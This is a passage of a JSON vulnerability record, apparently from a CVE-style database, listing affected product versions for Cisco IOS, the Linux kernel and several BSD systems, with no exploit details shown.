        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)fc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xg5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ew"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xg5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)yd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(9\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.19"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)xy6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)ex"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ew1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zl1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(5b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ea2c"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.26"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ay"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ey2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(13\\)s8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)dc2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(9\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)s8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.68"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)xb2"
      },
      {
        "model": "catalyst blade switch 3020",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(50\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(24c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sw4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3bc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.24"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xv5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)db1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xv3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xd3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(13b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)t16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3ma"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2tpc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11b\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.53"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)st2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12c\\)ec"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2dd"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.6.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ca"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.1.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)s7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5a\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(3d\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(24b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0t"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)jk5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)se"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(26\\)p5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(26\\)e1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(05\\)wc8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xd2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xg"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)ec1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2bz"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3ye"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sw3a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xs"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(13\\)w5\\(19c\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(7a\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.51"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)za2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5\\)b1"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3a\\)e8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)mr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)ec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xu2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(4\\)f"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xh2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xd1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(27\\)s1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3\\(4.2\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t5"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "3.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)xr3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)sc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xh"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)eo3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(3i\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)t3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)xt3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8a\\)ew1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(27\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xk2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sec2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)xe"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.0"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xd1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)xm"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)w5\\(22b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(24\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1.1\\)pi"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2dx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(9.4\\)da"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ga"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(16\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)bc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3ym"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ec1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12m\\)"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "3.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)ja1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)ew"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)s2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)sl6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2\\)xd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(14\\)gs2"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(6e\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12.02\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sy03"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14\\)st3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5e\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2wa3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.35"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)st1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zj3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xq"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)mb12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2seb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5f\\)"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bc2i"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(22b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3\\)xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ewa"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(17\\)cc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(3\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.36"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xn"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(4\\)xaf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)st7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)ex"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zi"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.51"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(9\\)xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14\\)s8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yj"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)mr1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2eu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xq1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)eu1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yf"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xe3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
